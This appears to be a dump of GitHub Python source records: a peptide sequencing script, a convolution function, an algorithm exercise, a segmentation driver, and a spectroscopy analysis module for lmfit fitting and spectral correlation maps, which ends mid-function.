open(dirname(__file__) + 'dataset.txt').read().strip().split()\nN 
= int(dataset[0])\nSpectrum = [int(i) for i in dataset[1:]]\nparentMass = Spectrum[-1]\n\nLeaderboard = []\nLeaderPeptide = []\nflag = True\nwhile(len(Leaderboard)>0 or flag):\n\tflag = False\n\tLeaderboard = Expand(Leaderboard)\n\ttmpLeaderboard = Leaderboard[:] # shallow copy, so items can be removed from Leaderboard while iterating\n\tfor item in tmpLeaderboard:\n\t\tif getMass(item)==parentMass:\n\t\t\tif cycScore(item, Spectrum) > cycScore(LeaderPeptide, Spectrum):\n\t\t\t\tLeaderPeptide = item\n\t\telif getMass(item)>parentMass:\n\t\t\tLeaderboard.remove(item)\n\tLeaderboard = Trim(Leaderboard,Spectrum,N)\n\n\nfor i in range(len(LeaderPeptide)):\n\tif i != 0:\n\t\tprint('-',end='')\n\tprint(LeaderPeptide[i],end='')","repo_name":"luoguanghao/bioinfo_algo_script","sub_path":"M2_Week4_LeaderboardCyclopeptideSequencing.py","file_name":"M2_Week4_LeaderboardCyclopeptideSequencing.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"37058912246","text":"#!/usr/bin/env python3\n\"\"\"Contains the function convolve_channels()\"\"\"\nimport numpy as np\n\n\ndef convolve_channels(images, kernel, padding='same', stride=(1, 1)):\n    \"\"\"Performs a convolution on images with channels\n\n    Args:\n        images (numpy.ndarray),(m,h,w,c): contains images\n            m: number of images\n            h: height in pixels of images\n            w: width in pixels of images\n            c: number of channels in image\n        kernel (numpy.ndarray),(kh,kw,c): contains kernel for convolution\n            kh: height of kernel\n            kw: width of kernel\n        padding (tuple or str): if 'same', perform same\n            if 'valid', perform valid\n            if (tuple),(ph,pw):\n                ph: padding for height\n                pw: padding for width\n        stride (tuple),(sh,sw):\n            sh: stride height\n            sw: stride width\n\n    Returns:\n        numpy.ndarray containing convolved images\n    \"\"\"\n    m, h, w, c = images.shape\n    kh, kw, output_d = kernel.shape\n    sh, sw = stride\n\n    if padding == 'same':\n        pad_h = (((h - 1) * sh) + kh - h) // 2 + 1\n        pad_w = (((w - 1) * sw) + kw - w) // 2 + 1\n    elif padding == 'valid':\n        pad_h, pad_w = 0, 0\n    else:\n        pad_h, pad_w = padding\n    image_padded = np.pad(\n        images, ((0,), (pad_h,), (pad_w,), (0,)), 'constant'\n    )\n\n    out_h = (h + (2 * pad_h) - kh) // sh + 1\n    out_w = (w + (2 * pad_w) - kw) // sw + 1\n    output = np.zeros((m, out_h, out_w))\n\n    for x in range(out_h):\n        for y in range(out_w):\n            output[:, x, y] = np.sum(\n                kernel * image_padded[:, sh*x: sh*x+kh, sw*y: sw*y+kw],\n                axis=(1, 2, 3)\n            )\n\n    return output\n","repo_name":"kyle-gross/holbertonschool-machine_learning","sub_path":"math/0x03-convolutions_and_pooling/4-convolve_channels.py","file_name":"4-convolve_channels.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"16154085723","text":"# Solution 1\n# O(nLog(n) + mLog(m)) time / O(1) space\n# n - length of first array\n# m - length of second array\n\ndef smallestDifference(arrayOne, arrayTwo):\n    arrayOne.sort()\n    arrayTwo.sort()\n    idxOne = 0\n    idxTwo = 0\n    smallest = float(\"inf\")\n    current = float(\"inf\")\n    smallestPair = []\n    while idxOne < len(arrayOne) and idxTwo < len(arrayTwo):\n        firstNum = arrayOne[idxOne]\n        secondNum = arrayTwo[idxTwo]\n        if firstNum < secondNum:\n            current = secondNum - firstNum\n            idxOne += 1\n        elif firstNum > secondNum:\n            current = firstNum - secondNum\n            idxTwo += 1\n        else:\n            return [firstNum, secondNum]\n        if current < smallest:  # track the closest pair seen so far; without this the function always returned an empty list\n            smallest = current\n            smallestPair = [firstNum, secondNum]\n    return 
smallestPair\n","repo_name":"casp3rus/100DaysOfAlgo","sub_path":"018SmallestDifference/smallestDifference.py","file_name":"smallestDifference.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24101714937","text":"from codes.train_routines import train_semantic_segmentation_net, train_instance_segmentation_net, train_multitask_loss_net\nfrom codes.test_routines import quick_seg_inst_test, test_semantic_w_instance\nfrom parameters import training_parameters, parse_arguments, dataset_specific_parameters\nfrom codes.utils.resample import resample\nfrom codes.utils.batch_testing import batch_test, read_plots, show_side_results\n\n############################################################# Networks ######################################################################################\nnetwork_list = [\"unet\", \"rnet\", \"dlv3_net\", \"unet_double\", \"unet_double_multi\", \"unet_double_multi_learned_center\", \"unet_double_bandwidth\", \"unet_double_multi_fixed\"]\n\n############################################################# Datasets ######################################################################################\n# datasets = [\"2016_r\", \"AFRL\", \"Sangids\", \"Nuclei\", \"2016_s\"]\ndatasets = [\"2016_s\", \"2016_r\", \"Sangids\", \"AFRL\", \"voids\"]\n\n\nargs = parse_arguments(network_list, datasets)\nargs = dataset_specific_parameters(args)\nparameters = training_parameters(args)\nparameters.not_so_big = False\n\n############################################################# TRAIN ######################################################################################\nif(args.network < 3):\n if(args.mode == \"train_s\"):\n train_semantic_segmentation_net(parameters, args.training_dir, args.training_masks)\n elif(args.mode == \"train_i\"):\n train_instance_segmentation_net(parameters, args.training_dir, args.training_masks)\n elif(args.mode == \"train\"):\n train_semantic_segmentation_net(parameters, args.training_dir, args.training_masks)\n train_instance_segmentation_net(parameters, args.training_dir, args.training_masks)\nelse:\n if(args.mode == \"train\"):\n train_multitask_loss_net(parameters, args.training_dir, args.training_masks)\n\nprint(args.subsample)\n####################################\nif(args.subsample != '.'):\n resample(parameters, resample_masks=2, factor=2, directory=args.subsample)\n exit()\n####################################\n\n############################################################# TEST ######################################################################################\nif(args.mode == \"quick\"):\n if(args.debug):\n mini_V, final_pred, final_fibers, final_clusters, mini_gt, seg_f1, ins_f1, ins_f1_object_wise, Ra = quick_seg_inst_test(parameters, start_point=args.start_point)\n else:\n mini_V, final_pred, final_fibers, mini_gt, seg_f1, ins_f1, ins_f1_object_wise, Ra = quick_seg_inst_test(parameters, start_point=args.start_point)\n final_clusters = None\n parameters.save_quick_results(mini_V, final_pred, final_fibers, mini_gt, seg_f1, ins_f1, final_clusters=final_clusters)\nelif(args.mode == \"test\"):\n parameters.save_side = 1\n parameters.not_so_big = True\n # parameters.testing_mask = None\n # AFRL data length = 320\n # AFRL data length = 128\n mini_V, final_pred, final_fibers, mini_gt, seg_f1, ins_f1 = test_semantic_w_instance(parameters, length=128)\n final_clusters = None\n parameters.save_quick_results(mini_V, final_pred, final_fibers, 
mini_gt, seg_f1, ins_f1, final_clusters=final_clusters)\nelif(args.mode == \"resample_v\"):\n resample(parameters, resample_masks=0, factor=2)\nelif(args.mode == \"resample_m\"):\n resample(parameters, resample_masks=1, factor=2)\nelif(args.mode == \"resample_r\"):\n resample(parameters, resample_masks=2, factor=2)\n\nelif(args.mode == \"batch\"):\n batch_test(parameters, args)\nelif(args.mode == \"plots\"):\n read_plots(parameters.dataset_name)\n\nelif(args.mode == \"custom\"):\n network_architectures = [-2]\n\n datasets_options = [2]\n datasets_versions = [0, 1, 2]\n\n for n in network_architectures:\n for dt in datasets_options:\n for dt_v in datasets_versions:\n if(n == -1):\n # debug cluster multi\n args.debug_cluster = 1\n args.network = 4\n elif(n == -2):\n # debug cluster double\n args.debug_cluster = 1\n args.network = 0\n args.loss = 1\n elif(n == 0.5):\n # debug cluster offset\n args.loss = 1\n else:\n args.network = n\n\n args.dataset_number = dt\n args.dataset_version = dt_v\n args.dataset_name = datasets[args.dataset_number]\n args = dataset_specific_parameters(args)\n parameters = training_parameters(args)\n batch_test(parameters, args)\n\nelif(args.mode == \"compare\"):\n show_side_results(parameters.dataset_name, parameters.dataset_version)\n\nelse:\n print(\"Option {} not understood\".format(args.mode))\n","repo_name":"camilo-aguilar/Fiber-detection-cnn-and-geometric-regularization","sub_path":"main_cvpr.py","file_name":"main_cvpr.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22295603138","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 9 14:54:34 2020\r\n\r\n@author: Mekkering\r\n\"\"\"\r\n\r\n#\r\nimport os, numpy as np, csv, matplotlib.pyplot as plt, scipy.optimize as opt, math, struct, binascii, gc, time, random\r\nimport multiprocessing\r\nfrom operator import sub\r\nfrom joblib import Parallel, delayed\r\nimport scipy#, lmfit\r\nfrom scipy.optimize import minimize # used for implementation of maximum likelihood exponential fit\r\nfrom matplotlib import gridspec\r\nimport matplotlib.colors as mcolors\r\nfrom math import factorial\r\nfrom math import *\r\nfrom scipy.stats import poisson\r\nfrom scipy import fftpack\r\nimport matplotlib as mpl\r\nimport pickle\r\nimport numba as nb\r\nfrom joblib import Parallel, delayed\r\nimport multiprocessing\r\nfrom tqdm import tqdm\r\nimport pandas as pd\r\nfrom scipy.interpolate import interp1d\r\nfrom scipy.signal import savgol_filter\r\nimport re\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport matplotlib as mpl\r\nfrom lmfit.models import LorentzianModel, GaussianModel, VoigtModel, LinearModel, ConstantModel\r\n#mpl.rcParams['figure.dpi']= 300\r\nimport socket #enables to find computer name to make less of a mess with folders\r\n# %matplotlib auto\r\n\r\n\r\n#first functions I defined myself\r\n#mainly the fitting the timeaveraged stuff, correlation maps, cartesian to polar and fourier transforms of the correlation maps as also described in my reprot\r\ndef fittimeaverage(timeaverage,wavelengths,model):\r\n #only done to extract minimum background from timeaverage\r\n if model=='Gauss':\r\n lormod = GaussianModel(prefix='Gauss_')\r\n elif model=='Lor':\r\n lormod = LorentzianModel(prefix='Lor_')\r\n elif model=='Voigt':\r\n lormod = VoigtModel(prefix='Voigt_')\r\n \r\n\r\n pars = lormod.guess(timeaverage, x=wavelengths)\r\n \r\n constmod = 
ConstantModel(prefix='Const_') \r\n pars.update(constmod.make_params())\r\n \r\n mod = lormod + constmod\r\n \r\n init = mod.eval(pars, x=wavelengths)\r\n out = mod.fit(timeaverage, pars, x=wavelengths)\r\n \r\n \r\n plt.figure()\r\n plt.plot(wavelengths,timeaverage,label='experimental data')\r\n # plt.plot(wavelengths, out.init_fit, 'k--', label='initial fit')\r\n plt.plot(wavelengths,out.best_fit,label='best fit')\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Intensity')\r\n plt.legend(loc=0)\r\n \r\n return np.min(out.best_fit)\r\n\r\n\r\n \r\n \r\ndef fitspectra(binnedspectra,wavelengths,startfit,endfit,model,Debugmode=False):\r\n# binnedspectra is the array of timebins and wavelength bins\r\n #debugmode false/true for individual plots\r\n timeaverage = np.sum(binnedspectra,axis=1)\r\n if model=='Gauss':\r\n lormod = GaussianModel(prefix='Gauss_')\r\n elif model=='Lor':\r\n lormod = LorentzianModel(prefix='Lor_')\r\n elif model=='Voigt':\r\n lormod = VoigtModel(prefix='Voigt_')\r\n \r\n\r\n pars = lormod.guess(timeaverage, x=wavelengths)\r\n \r\n constmod = ConstantModel(prefix='Const_') \r\n pars.update(constmod.make_params())\r\n \r\n mod = lormod + constmod\r\n \r\n init = mod.eval(pars, x=wavelengths)\r\n out = mod.fit(timeaverage, pars, x=wavelengths)\r\n \r\n \r\n plt.figure()\r\n plt.plot(wavelengths,timeaverage,label='experimental data')\r\n # plt.plot(wavelengths, out.init_fit, 'k--', label='initial fit')\r\n plt.plot(wavelengths,out.best_fit,label='best fit')\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Intensity')\r\n plt.legend(loc=0)\r\n \r\n \r\n print('time averaged fit results',out.fit_report()) #with the outputs obtained here, fill in the next section as guess\r\n fitreport=out.fit_report()\r\n \r\n amplitude = float(fitreport.split('amplitude:')[-1].split('+')[0])\r\n # amplitudeerr = float(fitreport.split('amplitude:')[-1].split('+/-')[1].split('(')[0])\r\n center = float(fitreport.split('center:')[-1].split('+')[0])\r\n # centererr = float(fitreport.split('center:')[-1].split('+/-')[1].split('(')[0])\r\n sigma = float(fitreport.split('sigma:')[-1].split('+')[0])\r\n # sigmaerr = float(fitreport.split('sigma:')[-1].split('+/-')[1].split('(')[0])\r\n \r\n\r\n \r\n pars_amplitude = amplitude\r\n pars_center = center#these values are generated based on the above section. 
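# [editor's note] A self-contained lmfit sketch on synthetic data, mirroring the
# peak-plus-constant fit above. Reading results via out.params[...] is more
# robust than string-parsing out.fit_report() as the surrounding code does,
# since the report layout is not a stable API.
import numpy as np
from lmfit.models import GaussianModel, ConstantModel

x = np.linspace(600.0, 660.0, 200)                        # wavelengths (nm)
y = 50.0 * np.exp(-0.5 * ((x - 630.0) / 4.0) ** 2) + 7.0  # peak + background

gmod = GaussianModel(prefix='Gauss_')
cmod = ConstantModel(prefix='Const_')
pars = gmod.guess(y, x=x)
pars.update(cmod.make_params(c=float(y.min())))
out = (gmod + cmod).fit(y, pars, x=x)

center = out.params['Gauss_center'].value   # no fit_report() parsing needed
stderr = out.params['Gauss_center'].stderr  # may be None if errors are unavailable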
Look at print fitreport\r\n pars_sigma = sigma\r\n \r\n \r\n peakamplitude = np.zeros(endfit-startfit)\r\n peakamplitudeerr = np.zeros(endfit-startfit)\r\n peakcenter = np.zeros(endfit-startfit)\r\n peakcentererr = np.zeros(endfit-startfit)\r\n peaksigma = np.zeros(endfit-startfit)\r\n peaksigmaerr = np.zeros(endfit-startfit)\r\n \r\n if Debugmode==True: \r\n plt.figure()\r\n \r\n for spec in tqdm(range(startfit,endfit)):\r\n lormod = LorentzianModel()\r\n pars = lormod.guess(binnedspectra[:,spec]-np.min(binnedspectra[:,spec]), x=wavelengths)\r\n pars['amplitude'].set(value=pars_amplitude)\r\n pars['center'].set(value=pars_center)\r\n pars['sigma'].set(value=pars_sigma)\r\n \r\n # pars['fwhm'].set(value=14, min=5, max=20)\r\n # pars['height'].set(value=100, min=0, max=400)\r\n \r\n constmod = ConstantModel(prefix='Const_')\r\n pars.update(constmod.make_params())\r\n mod = lormod + constmod\r\n \r\n init = mod.eval(pars, x=wavelengths)\r\n out = mod.fit(binnedspectra[:,spec]-np.min(binnedspectra[:,spec]), pars, x=wavelengths)\r\n \r\n fitreportspec = out.fit_report()\r\n \r\n peakamplitude[spec] = float(fitreportspec.split('amplitude:')[-1].split('+')[0])\r\n peakamplitudeerr[spec] = float(fitreportspec.split('amplitude:')[-1].split('+/-')[1].split('(')[0])\r\n peakcenter[spec] = float(fitreportspec.split('center:')[-1].split('+')[0])\r\n peakcentererr[spec] = float(fitreportspec.split('center:')[-1].split('+/-')[1].split('(')[0])\r\n peaksigma[spec] = float(fitreportspec.split('sigma:')[-1].split('+')[0])\r\n peaksigmaerr[spec] = float(fitreportspec.split('sigma:')[-1].split('+/-')[1].split('(')[0])\r\n \r\n \r\n if Debugmode==True:\r\n \r\n plt.plot(wavelengths,binnedspectra[:,spec]-np.min(binnedspectra[:,spec]))\r\n # plt.plot(wavelengths1, init, 'k--', label='initial fit')\r\n plt.plot(wavelengths,out.best_fit,label='best fit spec '+str(spec))\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Intensity')\r\n # plt.legend()\r\n plt.show()\r\n \r\n return peakamplitude,peakamplitudeerr,peakcenter,peakcentererr,peaksigma,peaksigmaerr\r\n\r\n\r\n\r\n\r\ndef add_colorbar(im, aspect=20, pad_fraction=0.5, **kwargs):\r\n \"\"\"Add a vertical color bar to an image plot, which is aligned to the figure. Simply use add_colorbar(im) with im representing imshow\"\"\"\r\n divider = axes_grid1.make_axes_locatable(im.axes)\r\n width = axes_grid1.axes_size.AxesY(im.axes, aspect=1./aspect)\r\n pad = axes_grid1.axes_size.Fraction(pad_fraction, width)\r\n current_ax = plt.gca()\r\n cax = divider.append_axes(\"right\", size=width, pad=pad)\r\n plt.sca(current_ax)\r\n return im.axes.figure.colorbar(im, cax=cax, **kwargs)\r\n\r\n \r\ndef gaussian(x,A,mean,sigma,background):\r\n return A**2 / (sigma*np.sqrt(2*np.pi))*np.exp(-1 / 2 * (np.square((x-mean)/sigma**2)))+background\r\n\r\n\r\ndef rebin(arr, binning,):\r\n # reshapes the array. 
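# [editor's note] add_colorbar above references axes_grid1, which is never
# imported in this module, so calling it raises NameError. The likely-intended
# import (assumption) is:
#     from mpl_toolkits import axes_grid1
# Usage sketch once that import is present:
#     im = plt.imshow(np.random.rand(10, 10))
#     add_colorbar(im)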
If you increase the binning, then your array will be smaller because binning means how many things you would like to average over\r\n # calculates the mean of a certain array to produce a binning by reshaping the array\r\n numberspectra,numberwavelengths = arr.shape[1],arr.shape[0]\r\n shape = arr.reshape(int(numberspectra/binning),numberwavelengths,binning)\r\n mean = np.mean(shape,axis=2)\r\n meanreshaped = mean.reshape(numberwavelengths,int(numberspectra/binning))\r\n\r\n return meanreshaped\r\n\r\n\r\n \r\n\r\ndef spectralcorrelation(spectra1,spectra2,wavelengthsspectra1,wavelengthsspectra2,taus,plot):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n spectra1 : TYPE Array\r\n Data to be correlated with spectra2. Make sure to use a shape of (amount of wavelengths, amount of time bins)\r\n spectra2 : TYPE Array\r\n Data to be correlated with spectra1. Make sure to use a shape of (amount of wavelengths, amount of time bins)\r\n wavelengths : TYPE Array\r\n All the wavelengths of interest. Is used to display the photon pair correlation map.\r\n taus : TYPE list of taus that you are interested to see \r\n DESCRIPTION.\r\n plot : TYPE String of text.\r\n Type of plot you are interested to see. You can choose between 'corr' (correlation map), 'cov' (covariance map), 'norm' (normalization map), 'all' (all maps)\r\n\r\n Returns\r\n -------\r\n covariance : TYPE Array\r\n Covariance of the calculates taus. \r\n normalization : TYPE Array\r\n Normalization based on the standard deviations of the two types of lists. Calculates the outer product of the two times the length of the list (in time direction)\r\n correlation : TYPE Array\r\n Correlation (covariance divided by the normalization)\r\n\r\n Notes\r\n -------\r\n By choosing a part of spectra1 and spectra2, you can get postselection (and the average and normalization is adjusted on that)\r\n \"\"\"\r\n\r\n\r\n\r\n\r\n covariance = np.zeros((len(taus),len(spectra1),len(spectra2))) #saves the covariances, correlations for different taus\r\n normalization = np.zeros((len(taus),len(spectra1),len(spectra2)))\r\n correlationtemp = np.zeros((len(taus),len(spectra1),len(spectra2)))\r\n normlambda1 = np.zeros((len(taus),len(spectra1)))\r\n normlambda2 = np.zeros((len(taus),len(spectra2)))\r\n \r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for t in range(0,len(spectra1[0])-tau):\r\n covariance[i] += np.outer(spectra1[:,t],spectra2[:,t+tau])\r\n normlambda1[i,:] += spectra1[:,t]\r\n normlambda2[i,:] += spectra2[:,t+tau]\r\n normalization[i] = np.outer(normlambda1[i],normlambda2[i])*len(spectra1[0])+1 #the idea of the +1 was simply having to many dark counts which are averaged out and resulted in almost division by 0 errors. Nevertheless this also does not seem to work really properly actually.\r\n correlationtemp[i] = np.divide(covariance[i],normalization[i])\r\n \r\n correlation = np.zeros((len(taus),len(spectra1),len(spectra2))) \r\n #here I use the correction for the decaying component in the spectra. Basically, due to non-overlapping stuff this creates a worse correlation than actually true. 
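# [editor's note] The intermediate shape in rebin() looks transposed, but it is
# equivalent to averaging consecutive time bins: NumPy reshapes in C order, so
# reshape(..., binning).mean(axis=-1) averages runs of `binning` adjacent flat
# elements, and time is the fastest-varying axis of a (wavelengths, times)
# array. A clearer equivalent, shown on a toy array:
import numpy as np

def rebin_time_axis(arr, binning):
    nw, nt = arr.shape  # (n_wavelengths, n_times); nt must divide by binning
    return arr.reshape(nw, nt // binning, binning).mean(axis=2)

demo = np.arange(12, dtype=float).reshape(2, 6)
assert np.allclose(rebin_time_axis(demo, 2),
                   [[0.5, 2.5, 4.5], [6.5, 8.5, 10.5]])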
In order to circumvent that, either the data along the wavelength axes should be increased, or you have to do some correction (which are the lines below)\r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for t in range(0,len(spectra1[0])-tau):\r\n correlation[i] = correlationtemp[i]/(1-tau/len(spectra1[0]))\r\n \r\n minwavspec1 = np.min(np.delete(wavelengthsspectra1.ravel(),np.where(wavelengthsspectra1.ravel()<=1))) #done to select the wavelength on the correct axis\r\n maxwavspec1 = np.max(np.delete(wavelengthsspectra1.ravel(),np.where(wavelengthsspectra1.ravel()<=1))) # I dont want to construct a map with all zeros\r\n minwavspec2 = np.min(np.delete(wavelengthsspectra2.ravel(),np.where(wavelengthsspectra2.ravel()<=1)))\r\n maxwavspec2 = np.max(np.delete(wavelengthsspectra2.ravel(),np.where(wavelengthsspectra2.ravel()<=1)))\r\n \r\n if plot=='corr': #with the string you can select which graphs you would like to see\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Correlation map. tau = '+str(taus[i]))\r\n # if savefig=True: #attempt to save figures on the fly\r\n # plt.savefig('E:/Martijn/ETH/results/20200310_PM111_specdiffusion/QD2/Correlation_map_tau'+str(tau)+'_excitation',dpi=800) \r\n elif plot=='cov':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(covariance[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Covariance map. tau = '+str(tau))\r\n elif plot=='norm':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(normalization[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Normalization map. tau = '+str(tau)) \r\n \r\n elif plot=='all':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Correlation map. tau = '+str(taus[i]))\r\n \r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(covariance[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Covariance map. tau = '+str(tau))\r\n \r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(normalization[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Normalization map. tau = '+str(tau))\r\n \r\n else: #means that you dont want to see any plot\r\n pass\r\n \r\n return covariance, normalization, correlation \r\n \r\n\r\ndef pearsoncorrelation(spectra1,spectra2,wavelengthsspectra1,wavelengthsspectra2,taus,plot='None'):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n spectra1 : TYPE Array\r\n Data to be correlated with spectra2. 
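# [editor's note] The per-frame np.outer accumulation above is a matrix product
# in disguise; a vectorized sketch (assumed shape (n_wavelengths, n_times))
# that produces the same lag-tau covariance map in one BLAS call:
import numpy as np

def covariance_map(spectra1, spectra2, tau):
    T = spectra1.shape[1]
    return spectra1[:, :T - tau] @ spectra2[:, tau:].T

rng = np.random.default_rng(0)
a = rng.poisson(5.0, size=(4, 100)).astype(float)
b = rng.poisson(5.0, size=(4, 100)).astype(float)
loop = sum(np.outer(a[:, t], b[:, t + 3]) for t in range(100 - 3))
assert np.allclose(covariance_map(a, b, 3), loop)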
Make sure to use a shape of (amount of wavelengths, amount of time bins)\r\n spectra2 : TYPE Array\r\n Data to be correlated with spectra1. Make sure to use a shape of (amount of wavelengths, amount of time bins)\r\n wavelengths : TYPE Array\r\n All the wavelengths of interest. Is used to display the photon pair correlation map.\r\n taus : TYPE list of taus that you are interested to see \r\n DESCRIPTION.\r\n plot : TYPE String of text.\r\n Type of plot you are interested to see. You can choose between 'corr' (correlation map), 'cov' (covariance map), 'norm' (normalization map), 'all' (all maps)\r\n\r\n Returns\r\n -------\r\n covariance : TYPE Array\r\n Covariance of the calculates taus. \r\n normalization : TYPE Array\r\n Normalization based on the standard deviations of the two types of lists. Calculates the outer product of the two times the length of the list (in time direction)\r\n correlation : TYPE Array\r\n Correlation (covariance divided by the normalization)\r\n\r\n Notes\r\n -------\r\n By choosing a part of spectra1 and spectra2, you can get postselection (and the average and normalization is adjusted on that)\r\n \"\"\"\r\n #at the moment I still need to think about whether to let the function crash when the time dimension is not the same length for spectra1 and spectra2\r\n spectra1mean = np.mean(spectra1,axis=1) #subtract mean of the entire series to better observe fluctuations around the mean\r\n spectra2mean = np.mean(spectra2,axis=1)\r\n \r\n spectra1corr= np.zeros(spectra1.shape)\r\n spectra2corr= np.zeros(spectra2.shape)\r\n \r\n stdev1 = np.zeros((len(taus),len(spectra1)))\r\n stdev2 = np.zeros((len(taus),len(spectra2)))\r\n \r\n for j in range(0,len(spectra1)):\r\n spectra1corr[j,:] = spectra1[j,:]-spectra1mean[j] #mean is subtracted for each wavelength specific. Note that when plotting mean subtracted spectra you can not consider the gaussian curve anymore.\r\n \r\n for j in range(0,len(spectra2)): \r\n spectra2corr[j,:] = spectra2[j,:]-spectra2mean[j]\r\n \r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for j in range(0,len(spectra1)):\r\n # for t in range(0,len(spectra1corr[0])-tau): \r\n stdev1[i,j] = np.std(spectra1[j,0:len(spectra1corr[0])-tau]) #standard deviation is calculated for the intensities across the time direction\r\n \r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for j in range(0,len(spectra2)):\r\n stdev2[i,j] = np.std(spectra2[j,tau:len(spectra2corr[0])])\r\n \r\n\r\n covariance = np.zeros((len(taus),len(spectra1),len(spectra2))) #saves the covariances, correlations for different taus\r\n normalization = np.zeros((len(taus),len(spectra1),len(spectra2)))\r\n correlationtemp = np.zeros((len(taus),len(spectra1),len(spectra2)))\r\n \r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for t in range(0,len(spectra1corr[0])-tau):\r\n covariance[i] += np.outer(spectra1corr[:,t],spectra2corr[:,t+tau])\r\n \r\n normalization[i] = np.outer(stdev1[i],stdev2[i])*len(spectra1[0])\r\n correlationtemp[i] = np.divide(covariance[i],normalization[i])\r\n \r\n correlation = np.zeros((len(taus),len(spectra1),len(spectra2))) \r\n #here I use the correction for the decaying component in the spectra. Basically, due to non-overlapping stuff this creates a worse correlation than actually true. 
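# [editor's note] Sanity check of the Pearson normalization used above: with
# mean-subtracted rows, dividing the summed outer products by
# outer(std, std) * n_times puts ones on the diagonal.
import numpy as np

a = np.random.default_rng(7).normal(size=(3, 500))
a -= a.mean(axis=1, keepdims=True)
pearson = (a @ a.T) / (np.outer(a.std(axis=1), a.std(axis=1)) * a.shape[1])
assert np.allclose(np.diag(pearson), 1.0)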
In order to circumvent that, either the data along the wavelength axes should be increased, or you have to do some correction (which are the lines below)\r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for t in range(0,len(spectra1corr[0])-tau):\r\n correlation[i] = correlationtemp[i]/(1-tau/len(spectra1[0]))\r\n \r\n minwavspec1 = np.min(np.delete(wavelengthsspectra1.ravel(),np.where(wavelengthsspectra1.ravel()<=1))) #done to select the wavelength on the correct axis\r\n maxwavspec1 = np.max(np.delete(wavelengthsspectra1.ravel(),np.where(wavelengthsspectra1.ravel()<=1))) # I dont want to construct a map with all zeros\r\n minwavspec2 = np.min(np.delete(wavelengthsspectra2.ravel(),np.where(wavelengthsspectra2.ravel()<=1)))\r\n maxwavspec2 = np.max(np.delete(wavelengthsspectra2.ravel(),np.where(wavelengthsspectra2.ravel()<=1)))\r\n \r\n if plot=='corr': #with the string you can select which graphs you would like to see\r\n for i in range(len(taus)):\r\n tau=taus[i]\r\n # if tau==0:\r\n vmax0corr=np.nanmax(np.delete(correlation.ravel(),np.where(correlation.ravel()>=0.95))) #done to remove the whole =1 diagonal visualization and allows for better visualization of the plot\r\n # print(vmax0corr)\r\n plt.figure()\r\n plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2],vmax=vmax0corr)\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Correlation map. tau = '+str(taus[i]))\r\n # if savefig=True: #attempt to save figures on the fly\r\n # plt.savefig('E:/Martijn/ETH/results/20200310_PM111_specdiffusion/QD2/Correlation_map_tau'+str(tau)+'_excitation',dpi=800) \r\n \r\n # else:\r\n # plt.figure()\r\n # plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n # plt.colorbar()\r\n # plt.gca().invert_yaxis()\r\n # plt.xlabel('Wavelength (nm)')\r\n # plt.ylabel('Wavelength (nm)')\r\n # plt.title('Correlation map. tau = '+str(taus[i]))\r\n # if 